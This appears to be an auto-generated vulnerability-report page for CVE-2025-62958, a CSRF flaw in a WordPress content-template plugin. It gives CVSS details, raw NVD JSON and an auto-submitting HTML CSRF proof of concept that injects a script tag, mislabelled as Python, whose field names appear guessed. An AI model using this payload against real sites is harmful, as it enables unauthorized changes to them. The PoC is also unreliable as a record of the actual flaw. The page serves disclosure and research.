Security Vulnerability Report
中文
CVE-2025-62958 CVSS 4.3 MEDIUM

CVE-2025-62958

Published: 2025-10-27 02:15:56
Last Modified: 2026-04-28 22:16:23

Description

Cross-Site Request Forgery (CSRF) vulnerability in Clifton Griffin Simple Content Templates for Blog Posts & Pages simple-post-template allows Cross Site Request Forgery.This issue affects Simple Content Templates for Blog Posts & Pages: from n/a through <= 2.2.61.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simple Content Templates for Blog Posts & Pages (simple-post-template) <= 2.2.61

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62958 --> <!-- Simple Post Template Plugin CSRF Exploit --> <html> <body> <h2>CVE-2025-62958 CSRF PoC</h2> <p>Target: WordPress with Simple Post Template Plugin <= 2.2.61</p> <!-- Example: Create/Modify Template via CSRF --> <form action="http://target-wordpress-site/wp-admin/admin.php" method="POST" id="csrf-form"> <input type="hidden" name="page" value="simple_post_template" /> <input type="hidden" name="action" value="save_template" /> <input type="hidden" name="template_name" value="Malicious Template" /> <input type="hidden" name="template_content" value="<script>alert('XSS')</script>" /> <input type="hidden" name="nonce" value="" /> </form> <script> // Auto-submit form when page loads document.getElementById('csrf-form').submit(); </script> <p>If you see this text, the form was submitted.</p> <p>Note: nonce field is empty - plugin lacks CSRF protection</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62958", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:56.170", "lastModified": "2026-04-28T22:16:22.787", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Clifton Griffin Simple Content Templates for Blog Posts & Pages simple-post-template allows Cross Site Request Forgery.This issue affects Simple Content Templates for Blog Posts & Pages: from n/a through <= 2.2.61."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simple-post-template/vulnerability/wordpress-simple-content-templates-for-blog-posts-pages-plugin-2-2-61-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}